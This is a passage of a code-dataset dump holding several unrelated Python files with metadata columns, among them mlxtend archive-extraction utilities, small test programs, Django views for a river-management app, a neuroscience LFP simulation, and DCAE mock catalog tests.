opener, mode = tarfile.open, 'r:bz2'
elif path.endswith('.bz2'):
opener, mode = bz2.BZ2File, 'rb'
with open(path[:-4], 'wb') as fp_out, opener(path, 'rb') as fp_in:
for data in iter(lambda: fp_in.read(100 * 1024), b''):
fp_out.write(data)
return
else:
raise (ValueError,
"Could not extract `{}` as no extractor is found!".format(path))
if to_directory is None:
to_directory = os.path.abspath(os.path.join(path, os.path.pardir))
cwd = os.getcwd()
os.chdir(to_directory)
try:
file = opener(path, mode)
try:
file.extractall()
finally:
file.close()
finally:
os.chdir(cwd)
| # <NAME> 2014-2020
# contributor: <NAME>
# mlxtend Machine Learning Library Extensions
#
# A counter class for printing the progress of an iterator.
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause
import os
import tarfile
import zipfile
import bz2
import imageio
def check_exists(path):
path = os.path.expanduser(path)
return os.path.exists(path)
def makedir(path):
path = os.path.expanduser(path)
if not check_exists(path):
os.makedirs(path)
def listdir(path, extensions=''):
path = os.path.expanduser(path)
if check_exists(path):
return [f for f in os.listdir(path) if f.endswith(extensions)]
else:
raise FileNotFoundError
def read_image(filename, path=None):
if path is not None:
path = os.path.expanduser(path)
filename = os.path.join(path, filename)
if check_exists(filename):
return imageio.imread(filename)
else:
raise FileNotFoundError
def download_url(url, save_path):
from six.moves import urllib
save_path = os.path.expanduser(save_path)
if not check_exists(save_path):
makedir(save_path)
filename = url.rpartition('/')[2]
filepath = os.path.join(save_path, filename)
try:
print('Downloading '+url+' to '+filepath)
urllib.request.urlretrieve(url, filepath)
except ValueError:
raise Exception('Failed to download! Check URL: ' + url +
' and local path: ' + save_path)
def extract_file(path, to_directory=None):
path = os.path.expanduser(path)
if path.endswith('.zip'):
opener, mode = zipfile.ZipFile, 'r'
elif path.endswith(('.tar.gz', '.tgz')):
opener, mode = tarfile.open, 'r:gz'
elif path.endswith(('tar.bz2', '.tbz')):
opener, mode = tarfile.open, 'r:bz2'
elif path.endswith('.bz2'):
opener, mode = bz2.BZ2File, 'rb'
with open(path[:-4], 'wb') as fp_out, opener(path, 'rb') as fp_in:
for data in iter(lambda: fp_in.read(100 * 1024), b''):
fp_out.write(data)
return
else:
raise (ValueError,
"Could not extract `{}` as no extractor is found!".format(path))
if to_directory is None:
to_directory = os.path.abspath(os.path.join(path, os.path.pardir))
cwd = os.getcwd()
os.chdir(to_directory)
try:
file = opener(path, mode)
try:
file.extractall()
finally:
file.close()
finally:
os.chdir(cwd)
| en | 0.539263 | # <NAME> 2014-2020 # contributor: <NAME> # mlxtend Machine Learning Library Extensions # # A counter class for printing the progress of an iterator. # Author: <NAME> <<EMAIL>> # # License: BSD 3 clause | 2.683653 | 3 |
tests/typecheck/example_rat.py | yangdanny97/chocopy-python-compiler | 7 | 6623922 | class Rat(object):
n : int = 0
d : int = 0
def __init__(self : Rat):
pass
def new(self : Rat, n : int, d : int) -> Rat:
self.n = n
self.d = d
return self
def mul(self : Rat, other : Rat) -> Rat:
return Rat().new(self.n * other.n, self.d * other.d)
r1 : Rat = None
r2 : Rat = None
r1 = Rat().new(4, 5)
r2 = Rat().new(2, 3)
print(r1.mul(r2).mul(r2).n) | class Rat(object):
n : int = 0
d : int = 0
def __init__(self : Rat):
pass
def new(self : Rat, n : int, d : int) -> Rat:
self.n = n
self.d = d
return self
def mul(self : Rat, other : Rat) -> Rat:
return Rat().new(self.n * other.n, self.d * other.d)
r1 : Rat = None
r2 : Rat = None
r1 = Rat().new(4, 5)
r2 = Rat().new(2, 3)
print(r1.mul(r2).mul(r2).n) | none | 1 | 3.851952 | 4 | |
tests/cases/fib.py | MiguelMarcelino/py2many | 2 | 6623923 | #!/usr/bin/env python3
def fib(i: int) -> int:
if i == 0 or i == 1:
return 1
return fib(i - 1) + fib(i - 2)
if __name__ == "__main__":
assert fib(0) == 1
assert fib(1) == 1
assert fib(5) == 8
assert fib(30) == 1346269
print("OK")
| #!/usr/bin/env python3
def fib(i: int) -> int:
if i == 0 or i == 1:
return 1
return fib(i - 1) + fib(i - 2)
if __name__ == "__main__":
assert fib(0) == 1
assert fib(1) == 1
assert fib(5) == 8
assert fib(30) == 1346269
print("OK")
| fr | 0.221828 | #!/usr/bin/env python3 | 3.7587 | 4 |
ctf/models/Score.py | owenofengland/lCTF-Platform | 0 | 6623924 | <gh_stars>0
from . import User
from ctf import db
from sys import path
path.append("..")
class Score(db.Model):
id = db.Column(db.Integer, primary_key=True)
score = db.Column(db.Integer, default=0)
username = db.Column(db.String, db.ForeignKey('user.username'))
| from . import User
from ctf import db
from sys import path
path.append("..")
class Score(db.Model):
id = db.Column(db.Integer, primary_key=True)
score = db.Column(db.Integer, default=0)
username = db.Column(db.String, db.ForeignKey('user.username')) | none | 1 | 2.346419 | 2 | |
simulation-code/old_functions/Main_Sim_with_Kernel.py | young24/LFP-simulation-in-turtle-brain | 0 | 6623925 | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 08 13:46:08 2016
Main_Sim_with_Kernel
@author: superuser
"""
import os
from os.path import join
import time
import multiprocessing
import numpy as np
from scipy.interpolate import RegularGridInterpolator
def make_2D_to_3D(data,xLen,yLen):
'make linear xy index into 2d index'
data3D = np.zeros((xLen,yLen,np.shape(data)[1]))
for x in range(0,xLen):
for y in range(0,yLen):
data3D[x,y,:] = data[x*yLen+y,:]
return data3D
def calc_LFP(t):
print(t) # show the progress
xLen = 11
yLen = 11
lengthMEA = 500
zMin = -110
zMax = 220
zShift = 20 # z shift between stimulated neuron and cell layer
x = np.linspace(-lengthMEA,lengthMEA,xLen)
y = np.linspace(-lengthMEA,lengthMEA,yLen)
z = np.linspace(zMin,zMax,34)
kernelData = np.load('../Data/Python/kernelData_soma_z120.npy')
axonSyn = np.load('../Data/Python/axonSyn.npy')
LFPonMEA = np.zeros((xLen,yLen))
data = kernelData[:,t,:]
data3D = make_2D_to_3D(data,xLen,yLen)
LFP = RegularGridInterpolator((x, y, z), data3D)
interval = 100
for x_idx in range(0,xLen):
for y_idx in range(0,yLen):
sumLFP = 0
for pos in axonSyn:
if (-lengthMEA<=((x_idx-(xLen-1)/2)*interval-pos[0])<=lengthMEA and
-lengthMEA<=((y_idx-(xLen-1)/2)*interval-pos[1])<=lengthMEA and
zMin<=pos[2]-zShift<=zMax):
sumLFP += LFP([(x_idx-(xLen-1)/2)*interval-pos[0],
(y_idx-(yLen-1)/2)*interval-pos[1],pos[2]-zShift])
LFPonMEA[x_idx,y_idx] = sumLFP
folder = 'LFPonMEA'
if not os.path.isdir(folder):
os.mkdir(folder)
np.save(join(folder, 'LFPonMEAt'+str(t)+'.npy'),LFPonMEA)
def make_files_together(xLen,yLen):
'stack different time files into a single file'
LFPonMEA = np.zeros((xLen,yLen,401))
for t in range(0,401):
LFPonMEA[:,:,t] = np.load('LFPonMEA/LFPonMEAt'+str(t)+'.npy')
return LFPonMEA
if __name__ == '__main__':
start = time.time()
pool = multiprocessing.Pool(processes=4)
t = range(0,401)
pool.map(calc_LFP, t)
pool.close()
pool.join()
xLen = 11 # keep consistent with before ones
yLen = 11
LFPonMEA = make_files_together(xLen,yLen)
np.save('LFPonMEA.npy',LFPonMEA)
end = time.time()
print(end-start)
| # -*- coding: utf-8 -*-
"""
Created on Fri Apr 08 13:46:08 2016
Main_Sim_with_Kernel
@author: superuser
"""
import os
from os.path import join
import time
import multiprocessing
import numpy as np
from scipy.interpolate import RegularGridInterpolator
def make_2D_to_3D(data,xLen,yLen):
'make linear xy index into 2d index'
data3D = np.zeros((xLen,yLen,np.shape(data)[1]))
for x in range(0,xLen):
for y in range(0,yLen):
data3D[x,y,:] = data[x*yLen+y,:]
return data3D
def calc_LFP(t):
print(t) # show the progress
xLen = 11
yLen = 11
lengthMEA = 500
zMin = -110
zMax = 220
zShift = 20 # z shift between stimulated neuron and cell layer
x = np.linspace(-lengthMEA,lengthMEA,xLen)
y = np.linspace(-lengthMEA,lengthMEA,yLen)
z = np.linspace(zMin,zMax,34)
kernelData = np.load('../Data/Python/kernelData_soma_z120.npy')
axonSyn = np.load('../Data/Python/axonSyn.npy')
LFPonMEA = np.zeros((xLen,yLen))
data = kernelData[:,t,:]
data3D = make_2D_to_3D(data,xLen,yLen)
LFP = RegularGridInterpolator((x, y, z), data3D)
interval = 100
for x_idx in range(0,xLen):
for y_idx in range(0,yLen):
sumLFP = 0
for pos in axonSyn:
if (-lengthMEA<=((x_idx-(xLen-1)/2)*interval-pos[0])<=lengthMEA and
-lengthMEA<=((y_idx-(xLen-1)/2)*interval-pos[1])<=lengthMEA and
zMin<=pos[2]-zShift<=zMax):
sumLFP += LFP([(x_idx-(xLen-1)/2)*interval-pos[0],
(y_idx-(yLen-1)/2)*interval-pos[1],pos[2]-zShift])
LFPonMEA[x_idx,y_idx] = sumLFP
folder = 'LFPonMEA'
if not os.path.isdir(folder):
os.mkdir(folder)
np.save(join(folder, 'LFPonMEAt'+str(t)+'.npy'),LFPonMEA)
def make_files_together(xLen,yLen):
'stack different time files into a single file'
LFPonMEA = np.zeros((xLen,yLen,401))
for t in range(0,401):
LFPonMEA[:,:,t] = np.load('LFPonMEA/LFPonMEAt'+str(t)+'.npy')
return LFPonMEA
if __name__ == '__main__':
start = time.time()
pool = multiprocessing.Pool(processes=4)
t = range(0,401)
pool.map(calc_LFP, t)
pool.close()
pool.join()
xLen = 11 # keep consistent with before ones
yLen = 11
LFPonMEA = make_files_together(xLen,yLen)
np.save('LFPonMEA.npy',LFPonMEA)
end = time.time()
print(end-start)
| en | 0.801362 | # -*- coding: utf-8 -*- Created on Fri Apr 08 13:46:08 2016 Main_Sim_with_Kernel @author: superuser # show the progress # z shift between stimulated neuron and cell layer # keep consistent with before ones | 2.341095 | 2 |
runtests.py | seatme/django-axes | 0 | 6623926 | <reponame>seatme/django-axes<filename>runtests.py
#!/usr/bin/env python
import os
import sys
import django
from django.conf import settings
from django.test.utils import get_runner
def run_tests(settings_module, *modules):
os.environ['DJANGO_SETTINGS_MODULE'] = settings_module
django.setup()
TestRunner = get_runner(settings)
test_runner = TestRunner()
failures = test_runner.run_tests(*modules)
sys.exit(bool(failures))
if __name__ == '__main__':
run_tests('axes.test_settings', [
'axes.tests.AccessAttemptTest',
'axes.tests.AccessAttemptConfigTest',
'axes.tests.UtilsTest',
])
| #!/usr/bin/env python
import os
import sys
import django
from django.conf import settings
from django.test.utils import get_runner
def run_tests(settings_module, *modules):
os.environ['DJANGO_SETTINGS_MODULE'] = settings_module
django.setup()
TestRunner = get_runner(settings)
test_runner = TestRunner()
failures = test_runner.run_tests(*modules)
sys.exit(bool(failures))
if __name__ == '__main__':
run_tests('axes.test_settings', [
'axes.tests.AccessAttemptTest',
'axes.tests.AccessAttemptConfigTest',
'axes.tests.UtilsTest',
]) | ru | 0.26433 | #!/usr/bin/env python | 1.871243 | 2 |
georiviere/finances_administration/views.py | georiviere/Georiviere-admin | 7 | 6623927 | <filename>georiviere/finances_administration/views.py<gh_stars>1-10
from django.views import generic as generic_views
from django.utils.translation import gettext_lazy as _
from mapentity import views as mapentity_views
from geotrek.authent.decorators import same_structure_required
from rest_framework import permissions as rest_permissions
from georiviere.main.views import FormsetMixin
from georiviere.finances_administration.models import AdministrativeFile, AdministrativeOperation
from georiviere.finances_administration.filters import AdministrativeFileFilterSet
from georiviere.finances_administration.forms import (
AdministrativeFileForm, AdministrativeOperationFormset, FundingFormSet,
ManDayFormSet, AdministrativeOperationCostsForm
)
from georiviere.finances_administration.serializers import AdministrativeFileSerializer, AdministrativeFileGeojsonSerializer
class AdministrativeFileFormsetMixin:
def form_valid(self, form):
context = self.get_context_data()
funding_formset = context['funding_formset']
adminoperation_formset = context['adminoperation_formset']
if form.is_valid():
administrative_file = form.save()
if funding_formset.is_valid():
funding_formset.instance = administrative_file
funding_formset.save()
else:
return self.form_invalid(form)
if adminoperation_formset.is_valid():
adminoperation_formset.instance = administrative_file
adminoperation_formset.save()
else:
return self.form_invalid(form)
return super().form_valid(form)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
if self.request.POST:
context['funding_formset'] = FundingFormSet(
self.request.POST,
instance=self.object
)
context['adminoperation_formset'] = AdministrativeOperationFormset(
self.request.POST,
instance=self.object
)
else:
context['funding_formset'] = FundingFormSet(
instance=self.object
)
context['adminoperation_formset'] = AdministrativeOperationFormset(
instance=self.object
)
return context
class AdministrativeFileList(mapentity_views.MapEntityList):
queryset = AdministrativeFile.objects.all()
filterform = AdministrativeFileFilterSet
columns = ['id', 'name']
class AdministrativeFileLayer(mapentity_views.MapEntityLayer):
queryset = AdministrativeFile.objects.all()
model = AdministrativeFile
properties = ['name']
def get_queryset(self):
return super().get_queryset()
class AdministrativeFileJsonList(mapentity_views.MapEntityJsonList, AdministrativeFileList):
pass
class AdministrativeFileFormat(mapentity_views.MapEntityFormat, AdministrativeFileList):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDocumentOdt(mapentity_views.MapEntityDocumentOdt):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDocumentWeasyprint(mapentity_views.MapEntityDocumentWeasyprint):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDetail(mapentity_views.MapEntityDetail):
queryset = AdministrativeFile.objects.all()
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context['can_edit'] = self.get_object().same_structure(self.request.user)
return context
class AdministrativeFileCreate(AdministrativeFileFormsetMixin, mapentity_views.MapEntityCreate):
model = AdministrativeFile
form_class = AdministrativeFileForm
class AdministrativeFileUpdate(AdministrativeFileFormsetMixin, mapentity_views.MapEntityUpdate):
model = AdministrativeFile
form_class = AdministrativeFileForm
@same_structure_required('finances_administration:administrativefile_detail')
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class AdministrativeFileDelete(mapentity_views.MapEntityDelete):
model = AdministrativeFile
@same_structure_required('finances_administration:administrativefile_detail')
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class AdministrativeFileViewSet(mapentity_views.MapEntityViewSet):
model = AdministrativeFile
queryset = AdministrativeFile.objects.all()
serializer_class = AdministrativeFileSerializer
geojson_serializer_class = AdministrativeFileGeojsonSerializer
permission_classes = [rest_permissions.DjangoModelPermissionsOrAnonReadOnly]
def get_queryset(self):
# Override annotation done by MapEntityViewSet.get_queryset()
return AdministrativeFile.objects.all()
class ManDayFormSet(FormsetMixin):
context_name = "manday_formset"
formset_class = ManDayFormSet
class AdministrativeOperationUpdate(ManDayFormSet, generic_views.UpdateView):
model = AdministrativeOperation
form_class = AdministrativeOperationCostsForm
def get_title(self):
return _("Edit costs for").format(self.get_object())
def get_success_url(self):
return self.get_object().administrative_file.get_detail_url()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['title'] = self.get_title()
return context
| <filename>georiviere/finances_administration/views.py<gh_stars>1-10
from django.views import generic as generic_views
from django.utils.translation import gettext_lazy as _
from mapentity import views as mapentity_views
from geotrek.authent.decorators import same_structure_required
from rest_framework import permissions as rest_permissions
from georiviere.main.views import FormsetMixin
from georiviere.finances_administration.models import AdministrativeFile, AdministrativeOperation
from georiviere.finances_administration.filters import AdministrativeFileFilterSet
from georiviere.finances_administration.forms import (
AdministrativeFileForm, AdministrativeOperationFormset, FundingFormSet,
ManDayFormSet, AdministrativeOperationCostsForm
)
from georiviere.finances_administration.serializers import AdministrativeFileSerializer, AdministrativeFileGeojsonSerializer
class AdministrativeFileFormsetMixin:
def form_valid(self, form):
context = self.get_context_data()
funding_formset = context['funding_formset']
adminoperation_formset = context['adminoperation_formset']
if form.is_valid():
administrative_file = form.save()
if funding_formset.is_valid():
funding_formset.instance = administrative_file
funding_formset.save()
else:
return self.form_invalid(form)
if adminoperation_formset.is_valid():
adminoperation_formset.instance = administrative_file
adminoperation_formset.save()
else:
return self.form_invalid(form)
return super().form_valid(form)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
if self.request.POST:
context['funding_formset'] = FundingFormSet(
self.request.POST,
instance=self.object
)
context['adminoperation_formset'] = AdministrativeOperationFormset(
self.request.POST,
instance=self.object
)
else:
context['funding_formset'] = FundingFormSet(
instance=self.object
)
context['adminoperation_formset'] = AdministrativeOperationFormset(
instance=self.object
)
return context
class AdministrativeFileList(mapentity_views.MapEntityList):
queryset = AdministrativeFile.objects.all()
filterform = AdministrativeFileFilterSet
columns = ['id', 'name']
class AdministrativeFileLayer(mapentity_views.MapEntityLayer):
queryset = AdministrativeFile.objects.all()
model = AdministrativeFile
properties = ['name']
def get_queryset(self):
return super().get_queryset()
class AdministrativeFileJsonList(mapentity_views.MapEntityJsonList, AdministrativeFileList):
pass
class AdministrativeFileFormat(mapentity_views.MapEntityFormat, AdministrativeFileList):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDocumentOdt(mapentity_views.MapEntityDocumentOdt):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDocumentWeasyprint(mapentity_views.MapEntityDocumentWeasyprint):
queryset = AdministrativeFile.objects.all()
class AdministrativeFileDetail(mapentity_views.MapEntityDetail):
queryset = AdministrativeFile.objects.all()
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context['can_edit'] = self.get_object().same_structure(self.request.user)
return context
class AdministrativeFileCreate(AdministrativeFileFormsetMixin, mapentity_views.MapEntityCreate):
model = AdministrativeFile
form_class = AdministrativeFileForm
class AdministrativeFileUpdate(AdministrativeFileFormsetMixin, mapentity_views.MapEntityUpdate):
model = AdministrativeFile
form_class = AdministrativeFileForm
@same_structure_required('finances_administration:administrativefile_detail')
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class AdministrativeFileDelete(mapentity_views.MapEntityDelete):
model = AdministrativeFile
@same_structure_required('finances_administration:administrativefile_detail')
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class AdministrativeFileViewSet(mapentity_views.MapEntityViewSet):
model = AdministrativeFile
queryset = AdministrativeFile.objects.all()
serializer_class = AdministrativeFileSerializer
geojson_serializer_class = AdministrativeFileGeojsonSerializer
permission_classes = [rest_permissions.DjangoModelPermissionsOrAnonReadOnly]
def get_queryset(self):
# Override annotation done by MapEntityViewSet.get_queryset()
return AdministrativeFile.objects.all()
class ManDayFormSet(FormsetMixin):
context_name = "manday_formset"
formset_class = ManDayFormSet
class AdministrativeOperationUpdate(ManDayFormSet, generic_views.UpdateView):
model = AdministrativeOperation
form_class = AdministrativeOperationCostsForm
def get_title(self):
return _("Edit costs for").format(self.get_object())
def get_success_url(self):
return self.get_object().administrative_file.get_detail_url()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['title'] = self.get_title()
return context
| en | 0.547028 | # Override annotation done by MapEntityViewSet.get_queryset() | 2.02809 | 2 |
alibi_detect/utils/pytorch/misc.py | sugatoray/alibi-detect | 1,227 | 6623928 | import torch
def zero_diag(mat: torch.Tensor) -> torch.Tensor:
"""
Set the diagonal of a matrix to 0
Parameters
----------
mat
A 2D square matrix
Returns
-------
A 2D square matrix with zeros along the diagonal
"""
return mat - torch.diag(mat.diag())
def quantile(sample: torch.Tensor, p: float, type: int = 7, sorted: bool = False) -> float:
"""
Estimate a desired quantile of a univariate distribution from a vector of samples
Parameters
----------
sample
A 1D vector of values
p
The desired quantile in (0,1)
type
The method for computing the quantile.
See https://wikipedia.org/wiki/Quantile#Estimating_quantiles_from_a_sample
sorted
Whether or not the vector is already sorted into ascending order
Returns
-------
An estimate of the quantile
"""
N = len(sample)
if len(sample.shape) != 1:
raise ValueError("Quantile estimation only supports vectors of univariate samples.")
if not 1/N <= p <= (N-1)/N:
raise ValueError(f"The {p}-quantile should not be estimated using only {N} samples.")
sorted_sample = sample if sorted else sample.sort().values
if type == 6:
h = (N+1)*p
elif type == 7:
h = (N-1)*p + 1
elif type == 8:
h = (N+1/3)*p + 1/3
h_floor = int(h)
quantile = sorted_sample[h_floor-1]
if h_floor != h:
quantile += (h - h_floor)*(sorted_sample[h_floor]-sorted_sample[h_floor-1])
return float(quantile)
| import torch
def zero_diag(mat: torch.Tensor) -> torch.Tensor:
"""
Set the diagonal of a matrix to 0
Parameters
----------
mat
A 2D square matrix
Returns
-------
A 2D square matrix with zeros along the diagonal
"""
return mat - torch.diag(mat.diag())
def quantile(sample: torch.Tensor, p: float, type: int = 7, sorted: bool = False) -> float:
"""
Estimate a desired quantile of a univariate distribution from a vector of samples
Parameters
----------
sample
A 1D vector of values
p
The desired quantile in (0,1)
type
The method for computing the quantile.
See https://wikipedia.org/wiki/Quantile#Estimating_quantiles_from_a_sample
sorted
Whether or not the vector is already sorted into ascending order
Returns
-------
An estimate of the quantile
"""
N = len(sample)
if len(sample.shape) != 1:
raise ValueError("Quantile estimation only supports vectors of univariate samples.")
if not 1/N <= p <= (N-1)/N:
raise ValueError(f"The {p}-quantile should not be estimated using only {N} samples.")
sorted_sample = sample if sorted else sample.sort().values
if type == 6:
h = (N+1)*p
elif type == 7:
h = (N-1)*p + 1
elif type == 8:
h = (N+1/3)*p + 1/3
h_floor = int(h)
quantile = sorted_sample[h_floor-1]
if h_floor != h:
quantile += (h - h_floor)*(sorted_sample[h_floor]-sorted_sample[h_floor-1])
return float(quantile)
| en | 0.696233 | Set the diagonal of a matrix to 0 Parameters ---------- mat A 2D square matrix Returns ------- A 2D square matrix with zeros along the diagonal Estimate a desired quantile of a univariate distribution from a vector of samples Parameters ---------- sample A 1D vector of values p The desired quantile in (0,1) type The method for computing the quantile. See https://wikipedia.org/wiki/Quantile#Estimating_quantiles_from_a_sample sorted Whether or not the vector is already sorted into ascending order Returns ------- An estimate of the quantile | 3.119844 | 3 |
hardware.py | ntw1103/deployment-thing | 0 | 6623929 | from flask import Flask, request, jsonify
import sqlite3 as sql
import time
import random
application = Flask(__name__)
def slow_process_to_calculate_availability(provider, name):
time.sleep(5)
return random.choice(['HIGH', 'MEDIUM', 'LOW'])
@application.route('/hardware/')
def hardware():
con = sql.connect('database.db')
c = con.cursor()
statuses = [
{
'provider': row[1],
'name': row[2],
'availability': slow_process_to_calculate_availability(
row[1],
row[2]
),
}
for row in c.execute('SELECT * from hardware')
]
con.close()
return jsonify(statuses)
if __name__ == "__main__":
application.run(host='0.0.0.0', port=5001)
| from flask import Flask, request, jsonify
import sqlite3 as sql
import time
import random
application = Flask(__name__)
def slow_process_to_calculate_availability(provider, name):
time.sleep(5)
return random.choice(['HIGH', 'MEDIUM', 'LOW'])
@application.route('/hardware/')
def hardware():
con = sql.connect('database.db')
c = con.cursor()
statuses = [
{
'provider': row[1],
'name': row[2],
'availability': slow_process_to_calculate_availability(
row[1],
row[2]
),
}
for row in c.execute('SELECT * from hardware')
]
con.close()
return jsonify(statuses)
if __name__ == "__main__":
application.run(host='0.0.0.0', port=5001)
| none | 1 | 2.727624 | 3 | |
mod/onboardingapi/dcae_cli/catalog/mock/tests/test_mock_catalog.py | onap/dcaegen2-platform | 1 | 6623930 | # ============LICENSE_START=======================================================
# org.onap.dcae
# ================================================================================
# Copyright (c) 2017-2018 AT&T Intellectual Property. All rights reserved.
# ================================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END=========================================================
#
# ECOMP is a trademark and service mark of AT&T Intellectual Property.
# -*- coding: utf-8 -*-
'''
Tests the mock catalog
'''
import json
from copy import deepcopy
from functools import partial
import pytest
from sqlalchemy.exc import IntegrityError
from dcae_cli.catalog.mock.catalog import MockCatalog, MissingEntry, DuplicateEntry, _get_unique_format_things
from dcae_cli.catalog.mock import catalog
_c1_spec = {'self': {'name': 'std.comp_one',
'version': '1.0.0',
'description': 'comp1',
'component_type': 'docker'},
'streams': {'publishes': [{'format': 'std.format_one',
'version': '1.0.0',
'config_key': 'pub1',
'type': 'http'}],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'config_key': 'call1'}],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [{"name": "foo",
"value": 1,
"description": "the foo thing",
"designer_editable": False,
"sourced_at_deployment": False,
"policy_editable": False},
{"name": "bar",
"value": 2,
"description": "the bar thing",
"designer_editable": False,
"sourced_at_deployment": False,
"policy_editable": False}
],
'artifacts': [{ "uri": "foo-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c2_spec = {'self': {'name': 'std.comp_two',
'version': '1.0.0',
'description': 'comp2',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "bar-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c2v2_spec = {'self': {'name': 'std.comp_two',
'version': '2.0.0',
'description': 'comp2',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_one',
'version': '1.0.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_one',
'version': '1.0.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "baz-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_c3_spec = {'self': {'name': 'std.comp_three',
'version': '3.0.0',
'description': 'comp3',
'component_type': 'docker'},
'streams': {'publishes': [],
'subscribes': [{'format': 'std.format_two',
'version': '1.5.0',
'route': '/sub1',
'type': 'http'}]},
'services': {'calls': [],
'provides': [{'request': {'format': 'std.format_one',
'version': '1.0.0'},
'response': {'format': 'std.format_two',
'version': '1.5.0'},
'route': '/prov1'}]},
'parameters': [],
'artifacts': [{ "uri": "bazinga-image", "type": "docker image" }],
'auxilary': {
"healthcheck": {
"type": "http",
"endpoint": "/health",
"interval": "15s",
"timeout": "1s"
}
}
}
_df1_spec = {
"self": {
"name": "std.format_one",
"version": "1.0.0",
"description": "df1"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_df2_spec = {
"self": {
"name": "std.format_two",
"version": "1.5.0",
"description": "df2"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_df2v2_spec = {
"self": {
"name": "std.format_two",
"version": "2.0.0",
"description": "df2"
},
"dataformatversion": "1.0.0",
"jsonschema": {
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"raw-text": {
"type": "string"
}
},
"required": ["raw-text"],
"additionalProperties": False
}
}
_cdap_spec={
"self":{
"name":"std.cdap_comp",
"version":"0.0.0",
"description":"cdap test component",
"component_type":"cdap"
},
"streams":{
"publishes":[
{
"format":"std.format_one",
"version":"1.0.0",
"config_key":"pub1",
"type": "http"
}
],
"subscribes":[
{
"format":"std.format_two",
"version":"1.5.0",
"route":"/sub1",
"type": "http"
}
]
},
"services":{
"calls":[
],
"provides":[
{
"request":{
"format":"std.format_one",
"version":"1.0.0"
},
"response":{
"format":"std.format_two",
"version":"1.5.0"
},
"service_name":"baphomet",
"service_endpoint":"rises",
"verb":"GET"
}
]
},
"parameters": {
"app_config" : [],
"app_preferences" : [],
"program_preferences" : []
},
"artifacts": [{"uri": "bahpomet.com", "type": "jar"}],
"auxilary": {
"streamname":"streamname",
"artifact_version":"6.6.6",
"artifact_name": "test_name",
"programs" : [{"program_type" : "flows", "program_id" : "flow_id"}]
}
}
def test_component_basic(mock_cli_config, mock_db_url, catalog=None):
'''Tests basic component usage of MockCatalog'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
enforce_image=False, db_url=mock_db_url)
else:
mc = catalog
c1_spec = deepcopy(_c1_spec)
df1_spec = deepcopy(_df1_spec)
df2_spec = deepcopy(_df2_spec)
user = "test_component_basic"
# success
mc.add_format(df2_spec, user)
# duplicate
with pytest.raises(DuplicateEntry):
mc.add_format(df2_spec, user)
# component relies on df1_spec which hasn't been added
with pytest.raises(MissingEntry):
mc.add_component(user, c1_spec)
# add df1 and comp1
mc.add_format(df1_spec, user)
mc.add_component(user, c1_spec)
with pytest.raises(DuplicateEntry):
mc.add_component(user, c1_spec)
cname, cver = mc.verify_component('std.comp_one', version=None)
assert cver == '1.0.0'
def test_format_basic(mock_cli_config, mock_db_url, catalog=None):
'''Tests basic data format usage of MockCatalog'''
if catalog is None:
mc = MockCatalog(db_name='dcae_cli.test.db', purge_existing=True,
db_url=mock_db_url)
else:
mc = catalog
user = "test_format_basic"
df1_spec = deepcopy(_df1_spec)
df2_spec = deepcopy(_df2_spec)
# success
mc.add_format(df1_spec, user)
